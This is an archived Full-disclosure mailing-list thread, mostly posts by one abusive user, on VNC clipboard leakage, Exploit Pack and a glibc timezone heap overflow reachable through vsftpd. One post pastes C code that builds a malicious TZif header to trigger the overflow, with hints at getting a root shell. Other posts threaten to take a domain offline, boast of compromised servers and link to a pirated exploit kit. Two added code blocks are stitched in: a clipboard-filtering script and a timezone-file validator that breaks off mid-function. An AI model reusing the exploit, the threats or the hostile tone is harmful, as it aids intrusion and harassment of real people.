Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
you are seriously more retarded than even the n3td3v+me+you
together...damn army..!


On 25 January 2012 19:29, Peter Osterberg j...@vel.nu wrote:
 Wasn't the original thread originally about VNC?

 On 01/25/2012 09:27 AM, GloW - XD wrote:
 derp, do you know what KVM IP is ?
 read up on how that relays ;)
 that's that.
 XD


 On 25 January 2012 18:44, Peter Osterberg j...@vel.nu wrote:
 On 01/24/2012 07:18 PM, Mario Vilas wrote:
 Guys, could you please read carefully everything before you reply?
 I read carefully. It still didn't make sense, though.

 And you wouldn't be allowed to use copy/paste while you edit sensitive
 documents either, I guess?
 I don't know how you could get to such a conclusion from what I wrote.

 You're reporting that if you copy and paste sensitive information and
 connect to a VNC session your clipboard data gets sent to the remote
 machine. That's pretty obvious and not a security hole that needs to
 be plugged.
 I don't think that is what Ben is saying. The clipboard gets sent to
 the server even before it is pasted; this happens without the user
 knowing of it.

 Notepad would have the paste button grayed otherwise, if the clipboard
 is empty, right? So it is already on the server before paste is pressed.

 So whatever was in the clipboard buffer is transmitted to the server on
 connection.

 This is at least the assumption I make from reading Ben's mails. Or...
 Is there a clipboard flag saying there is something on the clipboard, but
 it isn't transmitted until the user actually pastes? I haven't really
 got any experience with how the clipboard feature is implemented. My
 assumption is however that it has to be on server for notepad to be
 aware that Paste shouldn't be grayed out...

 I think Ben's report makes complete sense actually, it would be better to
 have the clipboard feature as a default. Security before features... =)

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
nice to send THIS one to fd, and you somehow admit to knowing it here;
yet, i told you what it was, exactly, don't try to make me look bad fag,
or i will drop your fucking domain, for a month :)
ciao beech.
xd


On 25 January 2012 19:55, Dan Yefimov d...@lightwave.net.ru wrote:
 On 25.01.2012 5:45, Ben Bucksch wrote:
 On 25.01.2012 00:52, Henri Salo wrote:
 On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote:
 On 25.01.2012 00:09, Dan Kaminsky wrote:
 IP KVM, in which the foreign server basically gets only inbound
 Keyboard and Mouse and outbound uncompressed pixels.
 That is *precisely* what VNC is: an open-source IP KVM.
 What the hell? Seriously..

 http://en.wikipedia.org/wiki/VNC

 hihi. Thanks.

 It transmits the keyboard and mouse events from one computer to
 another, relaying the graphical screen updates back in the other
 direction, over a network.
 The VNC protocol (RFB) is very simple, based on one graphic primitive
 from server to client ('Put a rectangle of pixel data at the specified
 X,Y position') and event messages from client to server.

 Compare to above.

 Now, the part where it defines that clipboard is also a standard part of
 VNC... oh, huch, it's not there! (Just a random note that Unicode is
 impossible, but not that clipboard is defined as part of the protocol at
 all.) Ah, I know... Surely, it must be on
 http://en.wikipedia.org/wiki/RFB_protocol... No, same thing there.
 Strange.

 It should be strictly understood that something not being mentioned in the
 Wikipedia article doesn't mean that it doesn't exist at all, since Wikipedia is
 _not_ an authoritative information source. The authoritative information source
 would be the formal specification of the protocol explicitly defining the set of
 event types and explicitly prohibiting non-defined event types; otherwise
 implementations are free to define and use their own event types, being in fact
 extensions of the protocol. It's defined nowhere that VNC is _exactly_ an
 open-source IP KVM and nothing more.

 P.S. I was just reporting a bug. I hope at least some software finds a
 better solution. Have fun.

 I'd suggest you find an alternative product allowing you to explicitly configure
 that the clipboard is not transmitted to the host under control instead of
 struggling with the product limitations and design flaws.
 --

 Sincerely Yours, Dan.



Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
ooops my bad, wrong guy, or, you don't understand this either ?




Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
Windows is even more secure, have you actually read any of the code /


On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote:
 That's not necessarily true. On Windows you can add custom clipboard formats
 that would contain a 'link' to the original source, causing the data to be
 actually passed when pasting. An example of this is when one copy+pastes a file.
 See the Windows Clipboard API for more info.

 Chris.



 On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote:

 I'm not sure how the clipboard works in Linux desktops (I understand
 it's a little different), but at least in Windows environments data
 has to be copied to the clipboard when you hit Ctrl-C. It can't be
 copied when you hit Ctrl-V because then the applications wouldn't know
 if there is anything to paste (like you said, the button would be
 grayed).

 So to replicate this behavior it's necessary to send the data as it's
 copied, not as it's pasted. Most (not all, but most) desktop systems
 assume clipboard data can be freely shared with all applications and
 don't have any kind of isolation at all. VNC was designed with the
 same idea.

 The bottom line is, the problem here is using VNC for what Ben is
 using it. There are many more problems with that scenario and
 clipboard sharing may be the least of them.

 On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
  On 01/24/2012 07:18 PM, Mario Vilas wrote:
  Guys, could you please read carefully everything before you reply?
  I read carefully. It still didn't make sense, though.
 
  And you wouldn't be allowed to use copy/paste while you edit sensitive
  documents either, I guess?
  I don't know how you could get to such a conclusion from what I wrote.
 
  You're reporting that if you copy and paste sensitive information and
  connect to a VNC session your clipboard data gets sent to the remote
  machine. That's pretty obvious and not a security hole that needs to
  be plugged.
 
  I don't think that is what Ben is saying. The clipboard gets sent to
  the server even before it is pasted; this happens without the user
  knowing of it.
 
  Notepad would have the paste button grayed otherwise, if the clipboard
  is empty, right? So it is already on the server before paste is pressed.
 
  So whatever was in the clipboard buffer is transmitted to the server on
  connection.
 
  This is at least the assumption I make from reading Ben's mails. Or...
  Is there a clipboard flag saying there is something on the clipboard, but
  it isn't transmitted until the user actually pastes? I haven't really
  got any experience with how the clipboard feature is implemented. My
  assumption is however that it has to be on server for notepad to be
  aware that Paste shouldn't be grayed out...
 
  I think Ben's report makes complete sense actually, it would be better to
  have the clipboard feature as a default. Security before features... =)
 



 --
 “There's a reason we separate military and the police: one fights the
 enemy of the state, the other serves and protects the people. When the
 military becomes both, then the enemies of the state tend to become
 the people.”




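Mario Vilas's point above (the viewer has to ship the host clipboard when it is copied, not when it is pasted) and Peter Osterberg's observation that it arrives on connection can both be checked on the wire. The following is an added example, not code from the thread or from any VNC project: it assumes the RFC 6143 client-to-server message layout, in which ClientCutText is type 6 followed by 3 padding bytes, a big-endian U32 length and that many Latin-1 bytes, and it runs over a constructed byte stream rather than a real capture. It shows a detection check (clipboard text arriving before any key or pointer event) and the filtering step a proxy could apply.

```python
"""Detect and filter RFB (VNC) clipboard transfers from viewer to server.

Added example; not code from the thread or from any VNC project. Assumes the
client->server message layout of RFC 6143: ClientCutText is type 6, then
3 padding bytes, a big-endian U32 length and that many Latin-1 bytes. The
sample stream at the bottom is constructed, not captured.
"""
import struct

# Client-to-server message types (RFC 6143, section 7.5).
SET_PIXEL_FORMAT = 0
SET_ENCODINGS = 2
FRAMEBUFFER_UPDATE_REQUEST = 3
KEY_EVENT = 4
POINTER_EVENT = 5
CLIENT_CUT_TEXT = 6

# Total size (type byte included) of the fixed-length client messages.
FIXED_SIZES = {
    SET_PIXEL_FORMAT: 20,
    FRAMEBUFFER_UPDATE_REQUEST: 10,
    KEY_EVENT: 8,
    POINTER_EVENT: 6,
}


def message_length(data: bytes, off: int) -> int:
    """Return the full length of the client message starting at data[off];
    raise ValueError on an unknown type. The caller handles truncation by
    comparing the returned length against the bytes actually present."""
    mtype = data[off]
    if mtype in FIXED_SIZES:
        return FIXED_SIZES[mtype]
    if mtype == SET_ENCODINGS:
        # type, 1 padding byte, U16 number-of-encodings, then S32 per encoding
        count = struct.unpack_from(">H", data, off + 2)[0]
        return 4 + 4 * count
    if mtype == CLIENT_CUT_TEXT:
        # type, 3 padding bytes, U32 length, then the clipboard text itself
        length = struct.unpack_from(">I", data, off + 4)[0]
        return 8 + length
    raise ValueError(f"unknown client message type {mtype} at offset {off}")


def iter_client_messages(data: bytes):
    """Yield (type, raw_bytes) for each complete message in a post-handshake
    client->server stream; stop silently at a trailing partial message."""
    off = 0
    while off < len(data):
        mtype = data[off]
        # The header that carries the length must be present before we read it.
        header = 8 if mtype == CLIENT_CUT_TEXT else 4
        if mtype not in FIXED_SIZES and off + header > len(data):
            break
        size = message_length(data, off)
        if off + size > len(data):
            break
        yield mtype, data[off:off + size]
        off += size


def audit_stream(data: bytes) -> dict:
    """Report clipboard text the viewer pushed to the server. Text arriving
    before any key or pointer event is exactly the case argued in the thread:
    the host clipboard crossed on connect, with no paste by the user."""
    texts, saw_input, before_input = [], False, False
    for mtype, raw in iter_client_messages(data):
        if mtype in (KEY_EVENT, POINTER_EVENT):
            saw_input = True
        elif mtype == CLIENT_CUT_TEXT:
            texts.append(raw[8:].decode("latin-1"))
            if not saw_input:
                before_input = True
    return {"cut_texts": texts, "clipboard_before_user_input": before_input}


def strip_cut_text(data: bytes) -> bytes:
    """Mitigation for a filtering proxy: re-emit the stream without any
    ClientCutText message, so the server never sees the host clipboard."""
    return b"".join(raw for mtype, raw in iter_client_messages(data)
                    if mtype != CLIENT_CUT_TEXT)


# Constructed sample: an update request, then clipboard text arriving before
# the user has typed or clicked anything, then a key press and a click.
SAMPLE_STREAM = (
    b"\x03\x00" + struct.pack(">HHHH", 0, 0, 800, 600)           # FramebufferUpdateRequest
    + b"\x06\x00\x00\x00" + struct.pack(">I", 8) + b"hunter2\n"  # ClientCutText
    + b"\x04\x01\x00\x00" + struct.pack(">I", 0x61)              # KeyEvent, 'a' pressed
    + b"\x05\x00" + struct.pack(">HH", 10, 20)                   # PointerEvent
)

if __name__ == "__main__":
    print(audit_stream(SAMPLE_STREAM))
    print(len(SAMPLE_STREAM), "->", len(strip_cut_text(SAMPLE_STREAM)),
          "bytes after filtering")
```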


Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
INSECURE i mean*




Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
fuckoff you ragdoll... i don't troll, and many on this fucking list
know it... fuck it... i ain't paying shit to anyone on this list, enjoy
finding your 0days, and, the next admins, go ahead and rm me, coz i
will be dropping your ass off of FD, until it makes me.
go die, and, maybe, you won't have money, and then, maybe, you will
have 10 wives, with 10 kids.
now go eat a burger.
rat


On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote:
 No, I only read the manual.

 Now go troll somewhere else. :)

 On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote:

 Windows is even more secure, have you actually read any of the code /



Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

2012-01-25 Thread GloW - XD
and stupidly, you forgot to add in the second private post i sent you,
saying i meant *insecure :)
now, go try to tell me windows vnc is secure again...and, then setup a
vnc on your box, and, under win32, try your best, when you're ready,
yell out, so i can make a complete fucking fool of ya.
ok ?
if this is how you want to play, i am challenging you, if i can own a
shitty windows setup you 'secure' as best you can, here on fd, is
this trolling is it ?
its a challenge... maybe, if you read the lame rfb and, pixelisation
via IP KVM, unfortunately for windows, it ain't any different, a pixel
is placed at X or Y, and, you can place data calls to it, from server
which, could be, my bot :)
want more proof,...keep going with my challenge then.



Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'

2012-01-25 Thread GloW - XD
stfu idiot..

now go look at your boxes :) and netstats and enjoy being part of
a much nicer, smaller organisation which is only here to destroy you
all. :)
bye!
oh btw, secunia.com is also owned.
have phun!
GLOW



On 26 January 2012 09:19, Dave m...@propergander.org.uk wrote:
 On 25/01/2012 20:16, adam wrote:
 If we cared, we'd visit that site of our own volition. Secondly, even if we
 were interested: most of the people on these lists are intelligent enough
 not to click on links from spammers. Third, even if the content were
 interesting, even if this were the place for it and even if you hadn't
 spammed: pay and register is incentive enough for me *not* to join and *
 not* to ever visit that site again.

 Short version: the purpose of this list isn't for you to spam your new
 state-of-the-art website. Instead, it's typically to discuss/disclose
 issues/concepts related to computer/network security. Once in a while,
 there are discussions about the overflowing stupidity that some site
 owners/coders have. For example, people that stupidly (and blindly) inject
 code (e.g. for tracking purposes) into every single file on their site,
 regardless of extension:

 http://www.karmacyberintel.net/robots.txt

 Another one is blatantly disclosing paths in robots.txt that aren't even
 linked to and would never be found anyway (at least by bots that honor
 robots.txt, which ends up being the exact opposite of the desired effect).
 An example of how/why this can be a problem:

 md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3,
 if we perform a simple Google search - we can determine that you're likely
 running version 3.3.1 of Wordpress. From there, we have enough information
 to perform a targeted attack on your server. Except, we don't need to
 because you've already made it more than easy enough for us.

 Pretty much every single field on http://www.karmacyberintel.net/pay/ is
 vulnerable to SQL injection, which could easily allow anyone to completely
 compromise the database and possibly the entire site. On top of that,
 register.php also allows for session fixation attacks, as a result of
 header/cookie manipulation. If that weren't bad enough, the admin section
 for your karma theme is also vulnerable to cross-site scripting.

 Not to mention all the problems with how you've configured SSL and
 everything else. If you're going to spam, at least make sure the website
 you're spamming has been tested and determined to be *somewhat* secure.




 Thanks for the smile.

 If one is not certain that one's own house is not made of glass, it's best
 not to throw stones.

 D

 On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel 
 karmacyberint...@gmail.com wrote:

 *UPDATE* After attacking several government sites to protest
 controversial US legislation in past weeks, hacktivist group Anonymous is
 setting its sights on one of the Internet's biggest targets: Facebook. Or
 maybe not.

 Sources from karmacyberintel.net

 for more details


 http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/







Re: [Full-disclosure] DoS attacks using Exploit Pack

2012-01-22 Thread GloW - XD
Hey i agree, why do you think i told the kingcope / kcope / dickhead
about putting some crap on here which doesn't work..then lying to me
about it, saying he had not read through the code...yet, others know it
doesn't work... he actually cried about this and parted my channel ;( im
so damn sad of this great loss...

good stuff!
at least it is able to be used to actually 'pentest', now, try adding
some actual working exploits in ok :P ehe..


On 23 January 2012 09:35, nore...@exploitpack.com wrote:
 DoS attacks by using Exploit Pack
 What is this? Exploit Pack is a next generation tool to assist you
 while you perform penetration testing to your workstations or servers.
 Make your workstation safe by testing its security. Before hackers do.

 Take a look of this tool while we perform a denial of service to a test
 site.
 http://www.youtube.com/watch?v=1dBa2jBu1XE

 Exploit Pack Team
 Juan Sacco
 Dev Lead
 http://exploitpack.com



Re: [Full-disclosure] DoS attacks using Exploit Pack

2012-01-22 Thread GloW - XD
http://www.exploitpack.com/wp-includes/

btw thx DiabloHor ;)
and this is leety shit :P
i did expect better dude... ffs, update or get owned!




Re: [Full-disclosure] DoS attacks using Exploit Pack

2012-01-22 Thread GloW - XD
http://exploitpack.com/download/modules/code/data/

man how leet!


On 23 January 2012 09:35,  nore...@exploitpack.com wrote:
 DoS attacks by using Exploit Pack
 What is this? Exploit Pack is a next generation tool to assist you
 while you perform penetration testing to your workstations or servers.
 Make your workstation safe by testing its security. Before hackers do.

 Take a look of this tool while we perform a denial of service to a test
 site.
 http://www.youtube.com/watch?v=1dBa2jBu1XE

 Exploit Pack Team
 Juan Sacco
 Dev Lead
 http://exploitpack.com




Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it

2012-01-20 Thread GloW - XD
ya just can't please 'em all on here :P


On 21 January 2012 10:24, Gage Bystrom themadichi...@gmail.com wrote:
 Well I apologize if you consider a 'dns lookup' to be a buzz word. I also
 apologize if you are incapable of understanding intent without it being
 spelled out for you that I was stating what I would do if I had seen that
 and I suggest he do something similar.

 What's your problem with me being specific instead of being vague about the
 steps? The difference between your idiotic Hollywood script and what I
 actually said is that I put an ounce of thought into mine. If you have a
 problem with what I said then explain what's wrong with it instead of going
 about with an ad hominem fallacy.

 Speaking of contribution what the hell are you contributing with all of
 this? I gave some 'trite advice' as to what he could do and I framed it as
 what I would have done. What's so bad about that? If you can do nothing but
 bitch about how my advice and my phrasing makes me a horrible person then
 you might as well move on. I certainly know that's what I intend to do. Oh
 wait, you have a problem with people stating what they would do in a given
 situation, I'm sorry. I'll try to be more considerate next time.

 On Jan 20, 2012 3:10 PM, James Condron ja...@zero-internet.org.uk wrote:

 Yeah, you really weren't, you were telling us how you would have handled
 it, with all the buzzwords and terms you could have thought of.

 Hell, I'm surprised you didn't manage to get the word 'synergy' in there.

  I would do a dns lookup and then compare those results to that of a
 public web service, and save the links for the AVs to check if they have any
 malicious history associated with them.

 Reads like a bad Hollywood script

 First I would ping the phone number and see if I could telnet to the
 ICMP, then get the PTR of the MAC address and use an ARP overflow and spoof
 the TTL of the Window Size and... (etc. etc.)

 What are you suggesting; take a look at where the request is coming from
 and make a decision based on that whether the software is being punted by
 facebook or a third party?

 Fine- just say that; make your suggestion and get on with your life. It's a
 little trite as advice goes, but if that's all you can contribute then go for
 it.

 Coming in with your Marky-Mark talk of First I'd get the first hijacker
 and use his head to kill the second hijacker and then I'd be all like 'yeah,
 lets land the plane here- let me drive' is not very helpful

 On 20 Jan 2012, at 22:37, Gage Bystrom wrote:

  What the hell are you talking about? I was just giving some advice on
  how he could check if it was legit or not if it happens again.
 
  What crawled up your ass and died this morning?
 
  On Jan 20, 2012 2:21 PM, ja...@zero-internet.org.uk wrote:
  You should tell us what you would have done had you been on one of the
  hijacked sept 11 planes.
 
  Bet things would have gone down different then, amiright?
 
  Sent from my BlackBerry® wireless device
 
  -Original Message-
  From: Gage Bystrom themadichi...@gmail.com
  Sender: full-disclosure-boun...@lists.grok.org.uk
  Date: Fri, 20 Jan 2012 13:29:01
  To: Wesley Kerfootwja...@gmail.com;
  full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk
  Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box
  has
   malware on it
 





Re: [Full-disclosure] Exploit Pack - New release

2012-01-19 Thread GloW - XD
So anyhow... came across this... for anyone interested in it.. this is
seemingly a bit old but, I will actually check it out, and then make my
judgement, although, I see msf2 and recall there were problemos,
especially with the whole SMB session setup and NT session stuff, and a
couple of other areas; DCERPC in any form seemed a bit tricky in those days of
msf2 when it was crossing, from I think .py or .rb to customised rb
with a really GREAT DCERPC FPhost application, so, I see that is there
but, is msf2/, so, if he ripped them off, well, I guess this is not a
payback at all but, finally, I'm going to fucking end this topic ok, so,
this guy is decent, or not decent, can be for once maybe put to bloody
rest, I mean, the guy is trying, albeit, he sucks, atm... but, maybe
this will show more, who knows, I have seen miracles happen.

http://hotfile.com/dl/142661738/73422d5/INSECTProFull.zip.html --
122 meg, unchecked, untested.. probably others of it around but, this
seems workable...

enjoy but, please, rate it at least afterwards... as I will delete it
after people have given the 'complete' exploitpack.com works, which,
this is also part of, so I would assume that exploitpack files should
work on insectpro, or not... this is what we can now ask and, well, he
can try sell it and scream Copyright all he likes, then, I will just
move it to my website, and make sure it is updated... so, I guess it
is, leave it till I say, or, it'll be online, free, forever, with
updates :)
ok.
have a lovely fucking FD wank day arseholes.




On 19 January 2012 06:26,  nore...@exploitpack.com wrote:
 Exploit Pack is a Security Tool that will assist you while you test
 the security of your workstations or networks. With a friendly and easy
 to use interface, it has an update manager to keep you up to date and an
 IDE to develop or modify its modules. Also we provide you with
 technical support if you need it. Try it out and purchase a subscription
 now. Make your computer safe using Exploit Pack.

 Make your workstation safe by testing its security before hackers,
 viruses or malware do. Mitigate, monitor and manage the latest security
 threats and vulnerabilities and implement active security policies by
 performing penetration tests across your infrastructure and
 applications.

 Visit us: http://exploitpack.com

 Exploit Pack Team
 Juan Sacco
 Dev Lead




Re: [Full-disclosure] [CVE-2012-0207] Linux IGMP Remote Denial Of Service

2012-01-19 Thread GloW - XD
Try fixing the in_cksum() function, it has been intentionally
crippled; also, look at both of the 'ips', both should really be argvs, as
they're set in saddr/daddr ;)
this should be easy to fix, or read the pasted one I think is in one
of my posts in reply to it, it will show where I had to adjust it, as
the sendto will never work with the in_cksum not functional, LAN or
no LAN...
anyhow, you could ignore me, but in the end, read the code... later dude.
drew



On 19 January 2012 09:43, Morgus Magnificent
morgusdamagnific...@gmail.com wrote:
 Thanks again for reinforcing my paranoia with another one of your exploits.
 The apache killer one was particularly disturbing and at the same time,
 another great eye-opener, much respect to you.

 I tested this on a custom compiled kernel for PXE booting, version
 2.6.37.6-x86_64, running Debian Squeeze, and I can't seem to get it to work.
 Root is mounted read-only over NFS.

 I don't recall any special config options I did for networking or IGMP
 requests, other than building my NIC drivers and NFS into the kernel.
 Did I just get lucky?

 Thanks,

 Morgus




Re: [Full-disclosure] p0f3 release candidate

2012-01-16 Thread GloW - XD
Thanks Mike,
I use the old p0f, from the FreeBSD ports collection so maybe time to
check out this new one eh :)
thx MZ.
drew


On 17 January 2012 09:10, Michal Zalewski lcam...@coredump.cx wrote:
 So just for the record, version 3.00 is now officially out:
 http://lcamtuf.coredump.cx/p03/. Many thanks to countless people who
 submitted signatures and bug fixes, including:

  Phil Ames
  Jason DePriest
  Dalibor Dukic
  Mark Martinec
  Damien Miller
  Nibbler
  Bernhard Rabe
  Chris John Riley
  Sebastian Roschke
  Peter Valchev
  Jeff Weisberg

 I won't be spamming the list with any further updates on p0f, but this
 being a major rewrite after ~6 years, I thought it makes sense to let
 people know - especially since the previous version is used in quite a
 few abuse detection / monitoring / pentesting frameworks.

 /mz




Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-09 Thread GloW - XD
There is an exploit for this.. if you look around... it also
works... and, u do have the src... I will pastebin it, just to make sure
no one cries :s

#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>

#define TZ_MAGIC "TZif"

/* Store a 32-bit value big-endian (network byte order), as tzfile counts are. */
#define PUT_32BIT_MSB(cp, value) \
do { \
    (cp)[0] = (value) >> 24; \
    (cp)[1] = (value) >> 16; \
    (cp)[2] = (value) >> 8;  \
    (cp)[3] = (value);       \
} while (0)

/* On-disk TZif header layout, see tzfile(5). */
struct tzhead {
    char tzh_magic[4];
    char tzh_version[1];
    char tzh_reserved[15];
    char tzh_ttisgmtcnt[4];
    char tzh_ttisstdcnt[4];
    char tzh_leapcnt[4];
    char tzh_timecnt[4];
    char tzh_typecnt[4];
    char tzh_charcnt[4];
};
/* Mirrors the reader's in-memory type record; only its alignment is used below. */
struct ttinfo {
    long int offset;
    unsigned char isdst;
    unsigned char idx;
    unsigned char isstd;
    unsigned char isgmt;
};

int main(void) {
    struct tzhead evil;
    int i;
    char *p;
    uint32_t total_size;
    uint32_t evil1, evil2;
    memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
    evil.tzh_version[0] = 0;
    memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
    memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
    memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
    memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
    memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
    evil1 = 500;
    PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
    total_size = evil1 * (sizeof(time_t) + 1);
    total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                  & ~(__alignof__ (struct ttinfo) - 1));
    evil2 = 0 - total_size;
    PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
    /* Write the raw header bytes to stdout. */
    p = (char *)&evil;
    for (i = 0; i < sizeof(evil); i++)
        printf("%c", p[i]);
    /* putenv("TZ=`pwd`/%s", evil);  as posted; not a valid putenv() call */
    for (i = 0; i < 5; i++)
        //printf("[+] Got root ..\n");
        printf("A");
    return 0;
}

Sorry but, I did remove the exec line and setuid but, also you must
setenv TZ=/path/to/nice/shell, and then you might get somewhere... it
is tricky, as there is the setenv, which can be done, I have made that
happen, but, it takes another .c file for this... but, I did also
modify this original one by someone else, which, only prints... the
overflow and trigger... but, to get root, you must play with bash
a little... but yea, it is very much also a problem, anyhow, I was
recently involved with tzdata patch, and, I had reported bugs going
back ages... anyhow, thx to dividead for his Timezone stuff... but, it
is tricky one.. but, very good :P , like, if setup similar to a
sendpage socket to socket, you may be able to send shellcode, to
unset/setenv TZ= , so then it can exec, but, unless it calls that
before adding setuid(0); etc... it won't work on prolly, anything...
dividead made a great post on it but, I have already hinted at bugs in
glib b4, guess, I don't like to give away, what kids don't need...
anyhow this is working buffer overflow for that CVE exactly.
have fucking fun assholes ./rant


On 10 December 2011 10:47, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
 -- Forwarded message --
 From: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
 Date: 10 December 2011 00:44
 Subject: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
 To: Ramon de C Valle rcva...@redhat.com


 Hi Ramon,
 Frankly I didn't look into the possibility to exploit this vulnerability,
 so I do not know if it is easy or hard to exploit. As you outlined
 it is difficult, during your audit you did not manage to trigger a
 function pointer call? : I guess not
 I am not much into exploiting heap based overruns in the old times fashion.
 BTW both freebsd and pure-ftpd load locale files (strace it and you
 will see) from /usr,
 these locale files are used for the ftp responses to make them written
 in international language.
 FreeBSD ftpd in conjunction with the locale files loading will SIGSEGV
 (EIP overwrite)
 due to a strcpy in locale responses in a special codepath. I did not
 find a way to exploit Pure-FTPD through this
 locale loading though, because Pure-FTPD is very restrictive in many ways even
 on response lines but there might be a vuln there too. (I don't
 remember if locale loading was only
 on FreeBSD or also on Linux or also in vsftpd, since the libc behaves
 very different in BSD/glibc/eglibc etc)

 Regards,

 Kingcope


 On 9 December 2011 19:32, Ramon de C Valle rcva...@redhat.com wrote:
 This is afaik a patched CVE in Linux glibc [1] which can be triggered 
 through
 the very secure ftp daemon [2] so it will only work on older linux distros.
 Be aware that vsftpd has privilege separation built in so this bug
 will not yield a root shell.
 It 

Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)

2011-12-09 Thread GloW - XD
http://dividead.wordpress.com/tag/heap-overflow/


oh wow, amazing, someone has already posted but, anyhow, the things are
explained here... and yes, if it overflows then ofc it can lead to
possible root

fucuall fd
/XD


On 10 December 2011 10:47, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
 -- Forwarded message --
 From: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
 Date: 10 December 2011 00:44
 Subject: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
 To: Ramon de C Valle rcva...@redhat.com


 Hi Ramon,
 Frankly I didn't look into the possibility to exploit this vulnerability,
 so I do not know if it is easy or hard to exploit. As you outlined
 it is difficult, during your audit you did not manage to trigger a
 function pointer call? : I guess not
 I am not much into exploiting heap based overruns in the old times fashion.
 BTW both freebsd and pure-ftpd load locale files (strace it and you
 will see) from /usr,
 these locale files are used for the ftp responses to make them written
 in international language.
 FreeBSD ftpd in conjunction with the locale files loading will SIGSEGV
 (EIP overwrite)
 due to a strcpy in locale responses in a special codepath. I did not
 find a way to exploit Pure-FTPD through this
 locale loading though, because Pure-FTPD is very restrictive in many ways even
 on response lines but there might be a vuln there too. (I don't
 remember if locale loading was only
 on FreeBSD or also on Linux or also in vsftpd, since the libc behaves
 very different in BSD/glibc/eglibc etc)

 Regards,

 Kingcope


 On 9 December 2011 19:32, Ramon de C Valle rcva...@redhat.com wrote:
 This is afaik a patched CVE in Linux glibc [1] which can be triggered 
 through
 the very secure ftp daemon [2] so it will only work on older linux distros.
 Be aware that vsftpd has privilege separation built in so this bug
 will not yield a root shell.
 It could yield root only in conjunction with a linux kernel vulnerability
 because the attacker
 will not be able to break the chroot without being root.
 This bug has a low severity because it's hard to exploit.
 Linux systems without patched glibc are vulnerable even if the latest
 version vsftpd-2.3.4 is installed.
 The bug is in the glibc timezone code. vsftpd loads timezone files
 from /usr [3]. If the attacker is inside a chroot
 he can easily create this directory and the timezone file and trigger
 the heap overrun.

 A Debugging Session illustrating the bug can be found on youtube:
 http://www.youtube.com/watch?v=KRCuozBM_dQ
 I did a brief analysis of this issue. And it seems vsftpd does not add 
 anything to this as an attack vector. Although we can control the size of 
 the chunk to be allocated (i.e. transitions), and can arbitrarily allocate 
 this chunk from fast bins, the main arena, or eventually, a new mmap()'ed 
 heap. We do not have any control over when its adjacent chunks are 
 allocated, freed, the type of their contents, when they will be used, how 
 they will be used, and if they will be used and useful at all. In addition, 
 the data used to overflow (i.e. transition times) are read and decoded as 
 4-byte integers in network (big-endian) byte order, which increases the 
 difficulty in faking any structure, such as the adjacent allocated chunk to, 
 at least, get outside of glibc scope after the overflow--since all return 
 paths from __tzfile_read free our controlled previously allocated chunk.

 Do you or anyone know a way to potentially exploit this vulnerability?


 Cheers!
 Thanks,


[1] http://dividead.wordpress.com/tag/heap-overflow/
[2] https://security.appspot.com/vsftpd.html
[3] For example /usr/share/zoneinfo/UTC-01:00

/Kingcope


 --
 Ramon de C Valle / Red Hat Security Response Team


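An added defensive example (not code from the thread, and not glibc's own check): a TZif header validator that computes the body size the six counts imply with overflow-checked arithmetic and rejects a header whose counts wrap or exceed the file length, which is the condition the crafted timecnt/charcnt pair discussed above relies on. Function and struct names are my own; the version-1 body layout follows tzfile(5), and the test headers are constructed, not real zone files.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* TZif header per tzfile(5): magic(4) version(1) reserved(15), then six
 * big-endian 32-bit counts at offsets 20..43; 44 bytes in total. */
#define TZ_HDR_LEN 44
#define TZ_MAGIC   "TZif"

struct tz_counts {
    uint32_t ttisgmtcnt, ttisstdcnt, leapcnt, timecnt, typecnt, charcnt;
};

static uint32_t get_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}
static void put_be32(unsigned char *p, uint32_t v)
{
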